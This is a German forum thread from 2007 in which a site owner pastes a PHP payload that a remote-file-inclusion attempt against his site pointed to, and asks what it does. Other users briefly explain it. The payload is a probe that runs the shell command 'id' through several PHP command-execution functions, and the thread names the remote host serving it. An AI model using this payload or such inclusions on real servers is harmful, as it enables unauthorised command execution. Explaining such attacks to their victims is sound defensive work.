Autor |
Hackversuch |
1 # 5
|
Gelöschter User |
Eingetragen am 15.11.2007 18:31 |
|
|
Moin zusammen.
Habe ja ( wem auch immer sei Dank) das Secure auf unserer HP www.sgs-torfteufel.de .
Habe mir mal so eine Adresse aus dem Logfile (welches reichlich gefüllt ist) kopiert und bin auf die Seite gegangen http://www.madinaedu.gov.sa/safeon.txt??. Folgendes prangte dort :
( Ich weiss, dass es sich um auführbaren Code handeln muss - weiss aber mangels PHP-Kenntnisse nicht was er bewirken soll. Vielleicht kann mir das einer von Euch verraten ???)
******Es folgt jetzt der Text der auf dieser Page zu sehen ist
<?php
echo "jimmywho";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec'){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'){
$res = @shell_exec($cfe);
}
elseif(function_exists('system'){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
********** Ende Text |
|
Autor |
RE: Hackversuch |
2 # 5
|
Gelöschter User |
Eingetragen am 19.11.2007 19:28 |
|
|
Danke slaughter.
So ganz befriedigend ist die Antwort dennoch nicht.
Ich weiss immer noch nicht was es denn bewirkt, was nach deiner Meinung keinen Schaden anrichten kann. |
|
Autor |
RE: Hackversuch |
3 # 5
|
gozoc Co-Admin u. Cheftester
Beiträge: 1047
Ort: Bayern
Eingetreten: 22.09.06 Status: Offline
|
Eingetragen am 19.11.2007 22:20 |
|
|
Die Befehle exec und shell_exec (als Beispiel) sind Versuche direkt auf Linux Befehle der Kommandozeile zu wirken ...
was aber bei den meisten, vernünftig eingestellten Linux Servern so nicht möglich ist. |
|
Autor |
RE: Hackversuch |
4 # 5
|
Gelöschter User |
Eingetragen am 19.11.2007 22:26 |
|
|
Danke gozoc.
Danke slaughter.
Thread kann geschlossen werden
|
|